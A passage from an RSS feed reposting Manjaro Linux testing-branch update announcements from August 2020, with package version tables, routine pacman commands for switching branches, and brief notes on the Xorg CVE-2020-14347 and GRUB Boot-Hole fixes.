                    lua53-filesystem                    -              1.8.0-3
                         lua53-mpack                    -              1.0.8-3
                      lua53-penlight                    -              1.6.0-2
                           lua53-sec                    -              2:0.9-2
                        lua53-socket                    -           20200329-1
                                pqiv                    -               2.11-4
                              rclone                    -             1.52.3-1
                              shards                    -             0.11.1-1


:: Different overlay package(s) in repository core aarch64

-------------------------------------------------------------------------------
                             PACKAGE          2020-08-06         2020-08-11
-------------------------------------------------------------------------------
                               linux                5.8-2              5.8.1-1
                       linux-headers                5.8-2              5.8.1-1
                uboot-odroid-n2-plus                    -        2015.01.112-2


:: Different sync package(s) in repository core aarch64

-------------------------------------------------------------------------------
                             PACKAGE          2020-08-06         2020-08-11
-------------------------------------------------------------------------------
                            iproute2              5.7.0-1              5.8.0-1
                               links             2.20.2-4               2.21-1
                             systemd              245.7-1              246.1-1
                        systemd-libs              245.7-1              246.1-1
                  systemd-resolvconf              245.7-1              246.1-1
                  systemd-sysvcompat              245.7-1              246.1-1


:: Different overlay package(s) in repository extra aarch64

-------------------------------------------------------------------------------
                             PACKAGE          2020-08-06         2020-08-11
-------------------------------------------------------------------------------
                          attica-git5.73.0.r758.gef33d1e-1                    -
                          breeze-git5.19.80.r2015.ge575c42d-1                    -
                    breeze-icons-git5.73.0.r1610.g9776efc2-1                    -
             extra-cmake-modules-git5.73.0.r3175.g6a278df-1                    -
            frameworkintegration-git5.73.0.r528.gfe2f686-1                    -
                     kactivities-git5.73.0.r1296.g5b8af490-1                    -
                        karchive-git5.73.0.r428.gcbd0b17-1                    -
                           kauth-git5.73.0.r368.g4960beb-1                    -
                      kbookmarks-git5.73.0.r345.g2c6cb26-1                    -
                        kcmutils-git5.73.0.r415.g57c7822-1                    -
                         kcodecs-git5.73.0.r317.g3c83f81-1                    -
                     kcompletion-git5.73.0.r374.g46377c4-1                    -
                         kconfig-git5.73.0.r709.g7c96cf2-1                    -
                  kconfigwidgets-git5.73.0.r481.ge3bdcc2-1                    -
                     kcoreaddons-git5.73.0.r1006.g614d986-1                    -
                          kcrash-git5.73.0.r323.g45e8369-1                    -
                     kdbusaddons-git5.73.0.r315.gde2efca-1                    -
                    kdeclarative-git5.73.0.r790.g909be01-1                    -
                     kdecoration-git5.19.80.r232.g0539093-1                    -
                       kdoctools-git5.73.0.r548.g8265a67-1                    -
                    kglobalaccel-git5.73.0.r373.gcfdbf5e-1                    -
                      kguiaddons-git5.73.0.r295.g51a6566-1                    -
                           ki18n-git5.73.0.r404.g1bc742e-1                    -
                     kiconthemes-git5.73.0.r434.ga4f1533-1                    -
                       kidletime-git5.73.0.r254.g8debece-1                    -
                           kinit-git5.73.0.r352.g91174aa-1                    -
                             kio-git5.73.0.r4116.gd8fa6aaa-1                    -
                 kirigami-addons-git        r19.a445f08-1                    -
                       kirigami2-git5.73.0.r2281.g80ce6971-1                    -
                      kitemviews-git5.73.0.r276.g99ec8d4-1                    -
                     kjobwidgets-git5.73.0.r307.g4518dce-1                    -
                       knewstuff-git5.73.0.r882.g19cd11a2-1                    -
                  knotifications-git5.73.0.r553.gb2f1e84-1                    -
                        kpackage-git5.73.0.r589.g705ad04-1                    -
                         kscreen-git      r1263.d9e2447-1                    -
                   kscreenlocker-git5.19.80.r795.gf53b9b3-1                    -
                        kservice-git5.73.0.r786.g04af66b-1                    -
                    ktextwidgets-git5.73.0.r331.gb5c1a48-1                    -
                         kwallet-git5.73.0.r984.gc8905cf-1                    -
                        kwayland-git5.73.0.r1019.gc8d44d3-1                    -
                 kwayland-server-git5.19.80.r1098.gcccc77f-1                    -
                  kwidgetsaddons-git5.73.0.r699.gc5d6ea9-1                    -
                            kwin-git   r18133.3cdfdeb98-1                    -
                   kwindowsystem-git5.73.0.r523.g97468c9-1                    -
                         kxmlgui-git5.73.0.r638.g2bbb468-1                    -
                      libkscreen-git      r1524.9da1c6a-1                    -
                            mesa-git20.2.0_devel.126769.c1476044b55-120.3.0_devel.126986.dd003abd2fc-1
                           pamac-cli              9.5.6-2              9.5.7-1
                        pamac-common              9.5.6-2              9.5.7-1
                pamac-flatpak-plugin              9.5.6-2              9.5.7-1
                           pamac-gtk              9.5.6-2              9.5.7-1
                   pamac-snap-plugin              9.5.6-2              9.5.7-1
             pamac-tray-appindicator              9.5.6-2              9.5.7-1
                plasma-framework-git5.73.0.r15507.ge0a721c10-1                    -
        plasma-wayland-protocols-git1.1.1.r1018.g61b389b-1                    -
                           solid-git5.73.0.r580.g0ac1bf3-1                    -
                          sonnet-git5.73.0.r541.g8e4b252-1                    -
                 spectral-matrix-git  218.r637.gca91709-1                    -
                            pipewire                    -            0.3.9-0.1
                       pipewire-alsa                    -            0.3.9-0.1
                       pipewire-docs                    -            0.3.9-0.1
                       pipewire-jack                    -            0.3.9-0.1
                      pipewire-pulse                    -            0.3.9-0.1


:: Different sync package(s) in repository extra aarch64

-------------------------------------------------------------------------------
                             PACKAGE          2020-08-06         2020-08-11
-------------------------------------------------------------------------------
                          accerciser             3.36.2-1             3.36.3-1
                              apache             2.4.43-1             2.4.43-2
                              attica             5.72.0-1             5.73.0-1
                        avidemux-cli              2.7.6-1              2.7.6-2
                         avidemux-qt              2.7.6-1              2.7.6-2
                               baloo             5.72.0-1             5.73.0-1
                     bash-completion               2.10-2               2.11-1
                            bluez-qt             5.72.0-1             5.73.0-1
                        breeze-icons             5.72.0-1             5.73.0-1
                               conky             1.11.5-3             1.11.5-4
                            epiphany             3.36.3-1             3.36.4-1
                           evolution             3.36.4-1             3.36.5-1
                evolution-bogofilter             3.36.4-1             3.36.5-1
               evolution-data-server             3.36.4-1             3.36.5-1
                       evolution-ews             3.36.4-1             3.36.5-1
              evolution-spamassassin             3.36.4-1             3.36.5-1
                 extra-cmake-modules             5.72.0-1             5.73.0-1
                              ffmpeg            2:4.3.1-1            2:4.3.1-2
                         file-roller             3.36.2-1             3.36.3-1
                     flatpak-builder             1.0.10-1             1.0.11-1
                                 fmt              6.2.1-3              7.0.3-1
                frameworkintegration             5.72.0-1             5.73.0-1
                              galera             26.4.4-1             26.4.5-1
                                 gdm             3.36.3-1             3.36.3-3
                       gnome-desktop           1:3.36.4-1           1:3.36.5-1
                             gnuplot              5.4.0-3              5.4.0-4
                            graphviz             2.44.1-2             2.44.1-3
                       grilo-plugins  0.3.11+4+g11cc1f8-11:0.3.11+4+g11cc1f8e-1
                    gst-plugins-ugly             1.16.2-3             1.16.2-4
               gtk-update-icon-cache          1:3.24.21-1          1:3.24.22-1
                                gtk3          1:3.24.21-1          1:3.24.22-1
                               gupnp              1.2.3-1              1.2.4-1
                         imagemagick          7.0.10.25-1          7.0.10.26-1
                     imagemagick-doc          7.0.10.25-1          7.0.10.26-1
                         kactivities             5.72.0-1             5.73.0-1
                   kactivities-stats             5.72.0-1             5.73.0-1
                             kapidox             5.72.0-1             5.73.0-1
                            karchive             5.72.0-1             5.73.0-1
                               kauth             5.72.0-1             5.73.0-1
                          kbookmarks             5.72.0-1             5.73.0-1
                       kcalendarcore             5.72.0-1             5.73.0-1
                            kcmutils             5.72.0-1             5.73.0-1
                             kcodecs             5.72.0-1             5.73.0-1
                         kcompletion             5.72.0-1             5.73.0-1
                             kconfig             5.72.0-1             5.73.0-1
                      kconfigwidgets             5.72.0-1             5.73.0-1
                           kcontacts           1:5.72.0-1           1:5.73.0-1
                         kcoreaddons             5.72.0-1             5.73.0-1
                              kcrash             5.72.0-1             5.73.0-1
                                kdav           1:5.72.0-1           1:5.73.0-1
                         kdbusaddons             5.72.0-1             5.73.0-1
                        kdeclarative             5.72.0-1             5.73.0-1
                                kded             5.72.0-1             5.73.0-1
                     kdelibs4support             5.72.0-1             5.73.0-1
                     kdesignerplugin             5.72.0-1             5.73.0-1
                               kdesu             5.72.0-1             5.73.0-1
                           kdewebkit             5.72.0-1             5.73.0-1
                              kdnssd             5.72.0-1             5.73.0-1
                           kdoctools             5.72.0-1             5.73.0-1
                          kemoticons             5.72.0-1             5.73.0-1
                       kfilemetadata             5.72.0-1             5.73.0-1
                        kglobalaccel             5.72.0-1             5.73.0-1
                          kguiaddons             5.72.0-1             5.73.0-1
                           kholidays           1:5.72.0-1           1:5.73.0-1
                               khtml             5.72.0-1             5.73.0-1
                               ki18n             5.72.0-1             5.73.0-1
                         kiconthemes             5.72.0-1             5.73.0-1
                           kidletime             5.72.0-1             5.73.0-1
                       kimageformats             5.72.0-1             5.73.0-1
                               kinit             5.72.0-1             5.73.0-1
                                 kio             5.72.0-1             5.73.0-1
                           kirigami2             5.72.0-1             5.73.0-1
                         kitemmodels             5.72.0-1             5.73.0-1
                          kitemviews             5.72.0-1             5.73.0-1
                         kjobwidgets             5.72.0-1             5.73.0-1
                                 kjs             5.72.0-1             5.73.0-1
                            kjsembed             5.72.0-1             5.73.0-1
                        kmediaplayer             5.72.0-1             5.73.0-1
                           knewstuff             5.72.0-1             5.73.0-1
                      knotifications             5.72.0-1             5.73.0-1
                       knotifyconfig             5.72.0-1             5.73.0-1
                            kpackage             5.72.0-1             5.73.0-1
                              kparts             5.72.0-1             5.73.0-1
                             kpeople             5.72.0-1             5.73.0-1
                           kplotting             5.72.0-1             5.73.0-1
                                kpty             5.72.0-1             5.73.0-1
                        kquickcharts             5.72.0-1             5.73.0-1
                               kross             5.72.0-1             5.73.0-1
                             krunner             5.72.0-2             5.73.0-1
                            kservice             5.72.0-1             5.73.0-1
                         ktexteditor             5.72.0-1             5.73.0-1
                        ktextwidgets             5.72.0-1             5.73.0-1
                     kunitconversion             5.72.0-1             5.73.0-1
                             kwallet             5.72.0-1             5.73.0-1
                            kwayland             5.72.0-1             5.73.0-1
                      kwidgetsaddons             5.72.0-1             5.73.0-1
                       kwindowsystem             5.72.0-1             5.73.0-1
                             kxmlgui             5.72.0-1             5.73.0-1
                       kxmlrpcclient             5.72.0-1             5.73.0-1
                         libbytesize                2.3-1                2.4-1
                             libebml             1.3.10-2              1.4.0-1
                              libgdm             3.36.3-1             3.36.3-3
                         libmatroska              1.5.2-2              1.6.2-1
                      libphonenumber             8.12.3-1             8.12.7-1
                   libva-mesa-driver             20.1.4-3             20.1.5-1
                              libx11             1.6.10-2             1.6.11-1
                            lighttpd             1.4.55-1             1.4.55-2
                                 lua              5.3.5-3              5.4.0-2
                             lua-lgi              0.9.2-2                    -
                            lua-lpeg              1.0.2-2              1.0.2-3
                          lua51-lpeg              1.0.2-2              1.0.2-3
                          lua52-lpeg              1.0.2-2              1.0.2-3
                             mariadb            10.4.13-1            10.4.14-1
                     mariadb-clients            10.4.13-1            10.4.14-1
                        mariadb-libs            10.4.13-1            10.4.14-1
                            mencoder              38157-2              38157-3
                                mesa             20.1.4-3             20.1.5-1
                          mesa-vdpau             20.1.4-3             20.1.5-1
                      mkvtoolnix-cli             47.0.0-1             49.0.0-2
                      mkvtoolnix-gui             47.0.0-1             49.0.0-2
                     modemmanager-qt             5.72.0-1             5.73.0-1
                              mpg123             1.26.2-1             1.26.3-1
                             mplayer              38157-2              38157-3
                               mytop            10.4.13-1            10.4.14-1
                     nautilus-sendto  3.8.6+14+ge8a3604-2  3.8.6+28+gc87aac4-1
                   networkmanager-qt             5.72.0-1             5.73.0-1
                                nmap               7.80-2               7.80-3
                         opencl-mesa             20.1.4-3             20.1.5-1
                                orca             3.36.3-1             3.36.4-1
                        oxygen-icons           1:5.72.0-1           1:5.73.0-1
                    oxygen-icons-svg           1:5.72.0-1           1:5.73.0-1
                    perl-alien-build               2.28-1               2.29-1
                        perl-net-dns               1.25-1               1.26-1
                                 php              7.4.9-1            7.4.9-1.1
                          php-apache              7.4.9-1            7.4.9-1.1
                             php-cgi              7.4.9-1            7.4.9-1.1
                           php-dblib              7.4.9-1            7.4.9-1.1
                           php-embed              7.4.9-1            7.4.9-1.1
                         php-enchant              7.4.9-1            7.4.9-1.1
                             php-fpm              7.4.9-1            7.4.9-1.1
                              php-gd              7.4.9-1            7.4.9-1.1
                            php-imap              7.4.9-1            7.4.9-1.1
                            php-intl              7.4.9-1            7.4.9-1.1
                            php-odbc              7.4.9-1            7.4.9-1.1
                           php-pgsql              7.4.9-1            7.4.9-1.1
                          php-phpdbg              7.4.9-1            7.4.9-1.1
                          php-pspell              7.4.9-1            7.4.9-1.1
                            php-snmp              7.4.9-1            7.4.9-1.1
                          php-sodium              7.4.9-1            7.4.9-1.1
                          php-sqlite              7.4.9-1            7.4.9-1.1
                            php-tidy              7.4.9-1            7.4.9-1.1
                             php-xsl              7.4.9-1            7.4.9-1.1
                    plasma-framework             5.72.0-1             5.73.0-1
                              prison             5.72.0-1             5.73.0-1
                          prometheus             2.20.0-1             2.20.1-1
                            protobuf             3.12.3-1             3.12.4-1
                             purpose             5.72.0-1             5.73.0-1
                     python-protobuf             3.12.3-1             3.12.4-1
               python-qscintilla-qt5             2.11.4-1             2.11.5-1
                  qqc2-desktop-style             5.72.0-1             5.73.0-1
                      qscintilla-qt5             2.11.4-1             2.11.5-1
                               rsync              3.2.2-2              3.2.3-1
                               solid             5.72.0-1             5.73.0-1
                              sonnet             5.72.0-1             5.73.0-1
                         syndication             5.72.0-1             5.73.0-1
                 syntax-highlighting             5.72.0-1             5.73.0-1
                           syslog-ng             3.28.1-1             3.28.1-2
                        threadweaver             5.72.0-1             5.73.0-1
                         ttf-caladea           20130214-3           20200113-2
                             tumbler              0.2.8-2              0.2.9-1
                                vala             0.48.8-1             0.48.9-1
                                 vlc             3.0.11-1           3.0.11.1-1
                  vulkan-mesa-layers             20.1.4-3             20.1.5-1
                       vulkan-radeon             20.1.4-3             20.1.5-1
                                x2643:0.159.r2999.296494a-13:0.160.r3011.cde9a93-1
                               xfwm4             4.14.4-1             4.14.5-1
             xorg-fonts-alias-100dpi              1.0.3-5              1.0.4-1
              xorg-fonts-alias-75dpi              1.0.3-5              1.0.4-1
           xorg-fonts-alias-cyrillic              1.0.3-5              1.0.4-1
               xorg-fonts-alias-misc              1.0.3-5              1.0.4-1
                           xournalpp             1.0.18-1             1.0.18-2
                               lua53                    -              5.3.5-1
                           lua53-lgi                    -              0.9.2-3
                          lua53-lpeg                    -              1.0.2-3
</code></pre>
<hr>
<p><strong>Testers needed on arm-testing branch</strong><br>
We are in need of testers for our arm-testing and arm-unstable branches.<br>
So if you are adventurous and want newer software quicker, we would love for you to help us test out the new packages in arm-testing branch.</p>
<p>All you have to do to switch to this branch is:</p>
<ul>
<li>Edit <code>/etc/pacman-mirrors.conf</code> and change <code>Branch = arm-stable</code> to <code>Branch = arm-testing</code>.</li>
<li>Run this command: <code>sudo pacman-mirrors -f5 &amp;&amp; sudo pacman -Syyu</code>. This will generate a new mirrorlist for you, sync your databases with the new mirror and update your system using the arm-testing branch.</li>
</ul>
<p>We would then love for you to give feedback in our update posts in <span class="hashtag">#manjaro-arm:arm-testing-updates</span>. That way we can better find and fix bugs, before they hit arm-stable branch. Thank you!</p>
<hr>
<div class="poll" data-poll-status="open" data-poll-type="regular" data-poll-name="poll">
<div>
<div class="poll-container">
<ul>
<li data-poll-option-id="893d9543968a33fa1039e2d7c2aff9f3">No issue, everything went smoothly</li>
<li data-poll-option-id="f62cf202dc0ce246aa612290c3f33f1f">Yes there was an issue. I was able to resolve it myself.(Please post your solution)</li>
<li data-poll-option-id="e1ee941aacf54cee0c82939acae184cc">Yes i am currently experiencing an issue due to the update. (Please post about it)</li>
</ul>
</div>
<div class="poll-info">
<p>
<span class="info-number">0</span>
<span class="info-label">voters</span>
</p>
</div>
</div>
</div>
            <p><small>2 posts - 1 participant</small></p>
            <p><a href="https://forum.manjaro.org/t/arm-testing-update-2020-08-11-systemd-pamac-plasma-frameworks-and-kernel/113">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Testing Update] 2020-08-11 - Firefox, KDE Frameworks, Gnome, Deepoin, Xorg-Fonts]]></title>
<description><![CDATA[Hello community,
Another testing branch update with some interesting updates for you!
2048×979 582 KB
We extended our hardware stack for ARM packaging … #stayhome, #staysafe, #stayhealthy


Frameworks is now at 5.73.0


Firefox got another beta release
Some more Gnome and Deepin updates
More upda...]]></description>
<link>https://tsecurity.de/de/1210185/unix-server/testing-update-2020-08-11-firefox-kde-frameworks-gnome-deepoin-xorg-fonts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1210185/unix-server/testing-update-2020-08-11-firefox-kde-frameworks-gnome-deepoin-xorg-fonts/</guid>
<pubDate>Sat, 15 Aug 2020 14:48:33 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hello community,</p>
<p>Another <strong>testing</strong> branch update with some interesting updates for you!</p>
<p></p><div class="lightbox-wrapper"><a class="lightbox" href="https://forum.manjaro.org/uploads/default/original/1X/d665945d82145a8c732297b096949976f21ea072.jpeg" data-download-href="https://forum.manjaro.org/uploads/default/d665945d82145a8c732297b096949976f21ea072" title=""><img src="https://forum.manjaro.org/uploads/default/optimized/1X/d665945d82145a8c732297b096949976f21ea072_2_690x329.jpeg" alt="" data-base62-sha1="uADOkNu3ADo7WAIW46Sg6pu0ImK" width="690" height="329" srcset="https://forum.manjaro.org/uploads/default/optimized/1X/d665945d82145a8c732297b096949976f21ea072_2_690x329.jpeg, https://forum.manjaro.org/uploads/default/optimized/1X/d665945d82145a8c732297b096949976f21ea072_2_1035x493.jpeg 1.5x, https://forum.manjaro.org/uploads/default/optimized/1X/d665945d82145a8c732297b096949976f21ea072_2_1380x658.jpeg 2x" data-small-upload="https://forum.manjaro.org/uploads/default/optimized/1X/d665945d82145a8c732297b096949976f21ea072_2_10x10.png"><div class="meta"><svg class="fa d-icon d-icon-far-image svg-icon" aria-hidden="true"><use xlink:href="#far-image"></use></svg><span class="filename"></span><span class="informations">2048×979 582 KB</span><svg class="fa d-icon d-icon-discourse-expand svg-icon" aria-hidden="true"><use xlink:href="#discourse-expand"></use></svg></div></a></div><br>
<em>We extended our hardware stack for ARM packaging … <span class="hashtag">#stayhome</span>, <span class="hashtag">#staysafe</span>, <span class="hashtag">#stayhealthy</span></em>
<ul>
<li>
<strong>Frameworks</strong> is now at <a href="https://kde.org/announcements/kde-frameworks-5.73.0">5.73.0</a>
</li>
<li>
<strong>Firefox</strong> got another beta release</li>
<li>Some more <strong>Gnome</strong> and <strong>Deepin</strong> updates</li>
<li>More updates to <strong>Xorg-Fonts</strong>
</li>
<li>Usual <strong>Python</strong> and <strong>Haskell</strong> package updates and rebuilds</li>
</ul>
<p>If you like following latest Plasma development you may also like to check out our current version of <a href="https://osdn.net/projects/manjaro-community/storage/kde-dev/20.1/">manjaro-kde-dev</a>, which we build on a regular basis against kde-git master packages. Also check out our latest RC of <strong>Manjaro Mikah 20.1</strong>! <a href="https://osdn.net/projects/manjaro/storage/xfce/20.1-rc3/">XFCE</a>, <a href="https://osdn.net/projects/manjaro/storage/kde/20.1-rc3/">KDE</a> and <a href="https://osdn.net/projects/manjaro/storage/gnome/20.1-rc3/">Gnome</a></p>
<hr>
<h3>Security Updates</h3>
<h4>Xorg-Server 1.20.8-4</h4>
<p>Fixes <a href="https://lwn.net/Articles/827704/">CVE-2020-14347</a>. No manual user intervention needed. Just update regularly.</p>
<p>Avoid leaking un-initalized memory to clients by zeroing the whole pixmap on initial allocation.<br>
This vulnerability was discovered by: Jan-Niklas Sohn working with Trend Micro Zero Day Initiative</p>
<h4>Grub 2.04-11.1</h4>
<p>Fixes <a href="https://eclypsium.com/2020/07/29/theres-a-hole-in-the-boot/">Boot-Hole</a> issue.<br>
You need to re-install <strong>grub</strong> on your system to complete the security fix: <a href="https://wiki.manjaro.org/index.php?title=GRUB/Restore_the_GRUB_Bootloader#For_BIOS_Systems">Bios-MBR</a>, <a href="https://wiki.manjaro.org/index.php?title=GRUB/Restore_the_GRUB_Bootloader#For_UEFI_Systems">UEFI Systems</a></p>
<h3>Upstream notice</h3>
<p><strong>Arch</strong> updated their default compression to <a href="https://lists.archlinux.org/pipermail/arch-dev-public/2019-December/029752.html">zstd</a>. We adopted to the same standard. More and more packages will have the <code>zst</code> extension from now on. If you get for what ever reason an error with ZSTD not supported as archive format you can do this:</p>
<pre><code class="lang-auto">sudo pacman -Syy
sudo pacman -S pacman-static
sudo pacman-static -Syyu
</code></pre>
<hr>
<p><strong>Our current supported kernels</strong></p>
<ul>
<li>linux44 4.4.232</li>
<li>linux49 4.9.232</li>
<li>linux414 4.14.193</li>
<li>linux419 4.19.138</li>
<li>linux54 5.4.57</li>
<li>linux57 5.7.14</li>
<li>linux58 5.8.0</li>
<li>linux54-rt 5.4.52_rt31</li>
<li>linux56-rt 5.6.17_rt9</li>
</ul>
<p><strong>Package Changes</strong> (Tue Aug 11 13:56:54 CEST 2020)</p>
<ul>
<li>testing community x86_64:  505 new and 500 removed package(s)</li>
<li>testing core x86_64:  2 new and 2 removed package(s)</li>
<li>testing extra x86_64:  143 new and 143 removed package(s)</li>
</ul>
<pre><code class="lang-auto">:: Different overlay package(s) in repository community x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2020-08-08           2020-08-11
-------------------------------------------------------------------------------
                        auto-cpufreq    1.2.r0.g4833367-1  1.2.1.r0.g0b253a2-1
                      gtk3-typeahead            3.24.21-1            3.24.22-1
   manjaro-asian-input-support-fcitx            2020.07-2            2020.08-1
  manjaro-asian-input-support-fcitx5            2020.07-2            2020.08-1
    manjaro-asian-input-support-ibus            2020.07-2            2020.08-1
                    obmenu-generator               0.88-1             0.88-2.1


:: Different sync package(s) in repository community x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2020-08-08           2020-08-11
-------------------------------------------------------------------------------
                             adlplug              1.0.1-2              1.0.1-3
                                agda             2.6.1-78             2.6.1-85
                             ansible             2.9.11-1             2.9.12-1
                             argbash              2.8.1-2              2.9.0-1
                              awxkit             13.0.0-1             14.0.0-1
                           benchmark              1.5.1-1              1.5.1-2
                               blosc             1.19.0-1             1.20.0-1
                                btfs               2.21-1               2.22-1
                                c2hs            0.28.6-98            0.28.6-99
                       cabal-install           3.2.0.0-48           3.2.0.0-53
                               cgrep            6.6.32-53            6.6.32-55
                         chrono-date 2.4.1+134+g9a0ee25-1              3.0.0-2
                             cockpit                224-1                225-1
                   cockpit-dashboard                224-1                225-1
                      cockpit-docker                224-1                225-1
                    cockpit-machines                224-1                225-1
                         cockpit-pcp                224-1                225-1
                      cockpit-podman                 20-1                 21-1
                              coturn            4.5.1.3-1            4.5.1.3-2
                             cryptol             2.9.0-11             2.9.0-16
                               darcs            2.14.4-47            2.14.4-53
                           darktable            2:3.0.2-7            2:3.2.1-1
                             dbeaver              7.1.3-1              7.1.4-1
                   deepin-calculator             5.5.26-1             5.5.27-1
                     deepin-calendar            5.7.0.4-2            5.7.0.5-1
                   deepin-compressor            5.8.0.5-1            5.8.0.6-1
               deepin-control-center            5.3.0.5-1            5.3.0.6-1
              deepin-desktop-schemas           5.6.0.14-1            5.8.0.4-1
              deepin-qt-dbus-factory            5.3.0.1-1            5.3.0.2-1
                deepin-session-shell           5.1.0.12-1            5.3.0.3-2
                     deepin-terminal             5.2.18-1             5.2.20-1
                               dhall            1.33.1-18            1.33.1-25
                          dhall-bash            1.0.31-28            1.0.31-35
                          dhall-json             1.7.0-26             1.7.0-33
                            easyjson              0.7.1-2              0.7.3-1
                            electron              9.1.2-1              9.2.0-1
                         emby-server            4.4.3.0-3            4.4.3.0-4
                              fcitx5     0.0.0.20200807-1     0.0.0.20200810-1
                   fcitx5-configtool     0.0.0.20200807-1     0.0.0.20200809-1
                           fcitx5-qt     0.0.0.20200803-3     0.0.0.20200809-1
           firefox-developer-edition             80.0b5-1             80.0b6-1
  firefox-developer-edition-i18n-ach             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-af             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-an             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-ar             80.0b5-1             80.0b6-1
  firefox-developer-edition-i18n-ast             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-az             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-be             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-bg             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-bn             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-br             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-bs             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-ca             80.0b5-1             80.0b6-1
firefox-developer-edition-i18n-ca-valencia       80.0b5-1             80.0b6-1
  firefox-developer-edition-i18n-cak             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-cs             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-cy             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-da             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-de             80.0b5-1             80.0b6-1
  firefox-developer-edition-i18n-dsb             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-el             80.0b5-1             80.0b6-1
firefox-developer-edition-i18n-en-ca             80.0b5-1             80.0b6-1
firefox-developer-edition-i18n-en-gb             80.0b5-1             80.0b6-1
firefox-developer-edition-i18n-en-us             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-eo             80.0b5-1             80.0b6-1
firefox-developer-edition-i18n-es-ar             80.0b5-1             80.0b6-1
firefox-developer-edition-i18n-es-cl             80.0b5-1             80.0b6-1
firefox-developer-edition-i18n-es-es             80.0b5-1             80.0b6-1
firefox-developer-edition-i18n-es-mx             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-et             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-eu             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-fa             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-ff             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-fi             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-fr             80.0b5-1             80.0b6-1
firefox-developer-edition-i18n-fy-nl             80.0b5-1             80.0b6-1
firefox-developer-edition-i18n-ga-ie             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-gd             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-gl             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-gn             80.0b5-1             80.0b6-1
firefox-developer-edition-i18n-gu-in             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-he             80.0b5-1             80.0b6-1
firefox-developer-edition-i18n-hi-in             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-hr             80.0b5-1             80.0b6-1
  firefox-developer-edition-i18n-hsb             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-hu             80.0b5-1             80.0b6-1
firefox-developer-edition-i18n-hy-am             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-ia             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-id             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-is             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-it             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-ja             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-ka             80.0b5-1             80.0b6-1
  firefox-developer-edition-i18n-kab             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-kk             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-km             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-kn             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-ko             80.0b5-1             80.0b6-1
  firefox-developer-edition-i18n-lij             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-lt             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-lv             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-mk             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-mr             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-ms             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-my             80.0b5-1             80.0b6-1
firefox-developer-edition-i18n-nb-no             80.0b5-1             80.0b6-1
firefox-developer-edition-i18n-ne-np             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-nl             80.0b5-1             80.0b6-1
firefox-developer-edition-i18n-nn-no             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-oc             80.0b5-1             80.0b6-1
firefox-developer-edition-i18n-pa-in             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-pl             80.0b5-1             80.0b6-1
firefox-developer-edition-i18n-pt-br             80.0b5-1             80.0b6-1
firefox-developer-edition-i18n-pt-pt             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-rm             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-ro             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-ru             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-si             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-sk             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-sl             80.0b5-1             80.0b6-1
  firefox-developer-edition-i18n-son             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-sq             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-sr             80.0b5-1             80.0b6-1
firefox-developer-edition-i18n-sv-se             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-ta             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-te             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-th             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-tl             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-tr             80.0b5-1             80.0b6-1
  firefox-developer-edition-i18n-trs             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-uk             80.0b5-1             80.0b6-1
   firefox-developer-edition-i18n-ur             80.0b5-1             80.0b6-1
